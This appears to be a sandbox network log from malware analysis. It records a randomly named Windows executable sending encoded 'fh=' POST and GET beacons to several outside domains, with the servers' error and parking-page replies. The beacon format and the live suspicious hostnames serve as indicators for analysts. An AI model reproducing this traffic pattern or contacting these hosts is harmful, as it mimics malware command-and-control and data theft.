                                                                                Host: www.t19yd.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:00.043262005 CET    302                  IN           HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                21            192.168.2.5    50004          208.115.225.220    80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:23:06.150337934 CET    789                  OUT          POST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=CGsRQZD1c2LTT5helwSSSSSwm+5ZbUOfEXiVtBUUZJiomotjiiRa02KnHzI53UtfPmiKieSgeRixF39SWdk8r1npF3G6mrldMK7rJfMtUD7YHHa/paz4nh/+lOW+3ciByex7o93HGKSKAJOzhXCuljEzIcwTFd5FGscxNPShKKSP99rIAWp5MDA3jQ7HUGX32LnC1Og=
                                                                                Dec 3, 2024 14:23:07.323339939 CET    481                  IN           HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:07 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                22            192.168.2.5    50005          208.115.225.220    80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:23:08.810997009 CET    809                  OUT          POST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZfyonL5jjjRaz2KnPTI8zUtqPmn3ieugeR2xF0pSXuc/xFnrOXGC7bldMK7rJfZGUCTYHXq/o7z37x//z+W+zcjpyewco/CcGMeKAI+zgCutsjE1WsxYBegLecB+PZnaVciq8Laia0hRfjsPzDzwF22eso3yrZ34I4Xc3JoKtEfGgYzaI02l
                                                                                Dec 3, 2024 14:23:09.944009066 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:09 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.5 | 50006 | 208.115.225.220 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:11.490062952 CET | 1826 | OUT | POST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:12.659482002 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:12 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.5 | 50007 | 208.115.225.220 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:14.150935888 CET | 528 | OUT | GET /gua3/?fh=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE1my8b04S6WdWKB/MDuWSU+6nbfM6wifiPOcueyLhQ==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.atendefacil.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:15.314378977 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:15 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.5 | 50008 | 104.21.15.100 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:29.428633928 CET | 789 | OUT | POST /k4tn/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=ZubRvge8VbTkzSg2L9aKRZnZ0wikLuCWQ8+hzLpwgD5lcYJd5o2+MJ4AISPoH9HOvnximwkUldJ+GuGSGHu9YAyX9BDatNo7qxJu1fdE5dOE80w+duZKgj1il2srSJrw6441Pp/a9af9C+sL+OB4yAbgeNAMP1jMw5k+GtBgyw8I3TbkbG7QbPTPBxezpdiknovGC+A=
                                                                                Dec 3, 2024 14:23:31.006062984 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:30 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpQNwzAmqe4NIAumq1Cse33ic5rRNspBjnm%2ByQUkP8Ptn79R2QqM6TjAiDJc1%2BlCfsKDdO%2BbuBSGGcoI4lfxYfnn2xpYnVgTLubWpFbSBfvR0hr%2BPfM%2FkXK1E2CFN%2B9%2BkX7Tlx87vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df22ae88c3eb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=789&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                Dec 3, 2024 14:23:31.006149054 CET | 123 | IN
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                26 | 192.168.2.5 | 50009 | 104.21.15.100 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:32.092540026 CET | 809 | OUT | POST /k4tn/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxdlc6Bd2Mi+LJ4AGyPpZNHRvn9cm04UldN+GseSG0GyZQyV1hDYito7qxJu1b8R5dGE8nY+dPZJjj1t02srFZr0645aPsC/9Zr9C+cLn/B37AbiTtB/fw+4prQpG7wnswgO7FqOBkz4Iv/3RiWE4tDN9L/2cpWVEDXOGG3chPbhX3MoI7M2
                                                                                Dec 3, 2024 14:23:33.724941015 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:33 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUbInTjZ1RkY4YWj%2BCPprIpIxxx3S86bN1l9m%2FvrOGG0BrdkRuxNfblfl4fBZWjVDZhbGa3XP4F5NBmbcRt0qfo%2B%2FTmsNDDnBAX3zGzVGthSuyktDhQhPOnihSEWDLWx%2BtnFXAufNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df33890a8cca-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
                                                                                Dec 3, 2024 14:23:33.724956989 CET | 119 | IN
                                                                                Data Ascii: ble MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                27 | 192.168.2.5 | 50010 | 104.21.15.100 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:34.763709068 CET | 1826 | OUT | POST /k4tn/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.sitioseguro.blog
                                                                                Origin: http://www.sitioseguro.blog
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.sitioseguro.blog/k4tn/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:36.371371031 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                Date: Tue, 03 Dec 2024 13:23:36 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wGo%2FYVakwqkXQUnTExHnAJs1mpUUQLvI0V261C0rDLV751h0zoSF4pLsvVlj4QwcR1vyxKPK6uXpq4LTMrNO2FG%2BhVmFU0lsOXUKGS9K56aveU20No%2BdV8d%2BXYcl5kbMkBH%2B2PBsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df4408d65e73-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2165&min_rtt=2165&rtt_var=1082&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to di
                                                                                Dec 3, 2024 14:23:36.371459961 CET | 121 | IN
                                                                                Data Ascii: sable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                28 | 192.168.2.5 | 50011 | 104.21.15.100 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:37.441838026 CET | 528 | OUT | GET /k4tn/?fh=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0B7YhLYlkSpf0LkSvuXOrVZCV81o0QxXj1FyFrGf5Q==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.sitioseguro.blog
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:40.129043102 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:23:39 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                                Accept-Ranges: bytes
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0sGONFDQYHrt8PUeKWo%2FaRqRyQqtK5E725erNV%2Fr0SsNNPWICBmm%2BT5kUTKC0cKNJQcurAUH6EJAvDDRQkihlYbGDfZkKjxy8%2FOGcYpSxqG3S1Z%2FcMcPUcS7ei0IoVRc5aNDWVblLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3df550d300f41-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1627&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: b50<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,la
                                                                                Dec 3, 2024 14:23:40.129066944 CET | 1236 | IN
                                                                                Data Ascii: bel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-h
                                                                                Dec 3, 2024 14:23:40.129079103 CET | 1236 | IN
                                                                                Data Ascii: svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-heig
                                                                                Dec 3, 2024 14:23:40.129147053 CET | 38 | IN
                                                                                Data Ascii: dding-left:.6875rem}.window-main__it
                                                                                Dec 3, 2024 14:23:40.158915043 CET | 1236 | IN
                                                                                Data Ascii: 1657em{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-l
                                                                                Dec 3, 2024 14:23:40.158941984 CET | 1236 | IN
                                                                                Data Ascii: 78049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20re
                                                                                Dec 3, 2024 14:23:40.159060001 CET | 1236 | IN
                                                                                Data Ascii: .625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem +
                                                                                Dec 3, 2024 14:23:40.159073114 CET | 1236 | IN
                                                                                Data Ascii: argin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid
                                                                                Dec 3, 2024 14:23:40.159296989 CET | 783 | IN
                                                                                Data Ascii: 92 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filterUnits=
                                                                                Dec 3, 2024 14:23:40.197566032 CET | 1236 | IN
                                                                                Data Ascii: c07<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.
                                                                                Dec 3, 2024 14:23:40.278935909 CET | 1236 | IN
                                                                                Data Ascii: the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></d


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                29 | 192.168.2.5 | 50012 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:45.772495985 CET | 807 | OUT | POST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=l7uh9+O+PwAoCGFzVrIFWiGt/CSLQCSDQfrvf1NsgW/hO1maAqXyP+2tnUN9aCBEaF2RhuNBZveB7R4RYYUUox0GmFwNhHcOjX2SKQjBkOQzW1Ic231jMx1WZ46oQFxKcoUhUlw8cA6np/R1DdQJWT4zxOySZdr1VHNA6YpE5y/wbgU6hFQUifGUzvELRYDWjDwyHYc=
                                                                                Dec 3, 2024 14:23:46.977547884 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:46 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: 5e672680-c018-459d-b9d2-896fb8eff65d
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=5e672680-c018-459d-b9d2-896fb8eff65d; expires=Tue, 03 Dec 2024 13:38:46 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:46.977574110 CET | 607 | IN
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWU2NzI2ODAtYzAxOC00NTlkLWI5ZDItODk2ZmI4ZWZmNjVkIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                30 | 192.168.2.5 | 50013 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:48.434071064 CET | 827 | OUT | POST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=l7uh9+O+PwAoDkRzWIgFBSGqziSLCCTKQf3vfw98hlbhOUWaBovyM+2t/EN8UiBDaFK3hsZBZu6B7TwRfrsXoh0Erlw1vncOjX2SKQmUkOIzVFYc5zZgFR1ZJo6oUFwDcoUHUksScCynp7B1DpMOcT41/uyCIOKCVxZp1pkAsCP9X2lQ7nY8x/qsj8M8Aoi/5ggCZPJzXRPlS6mgWWxt5/aKWtvH
                                                                                Dec 3, 2024 14:23:49.565680027 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:48 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: eac73d05-3aa8-4162-96ef-07d6ea191195
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
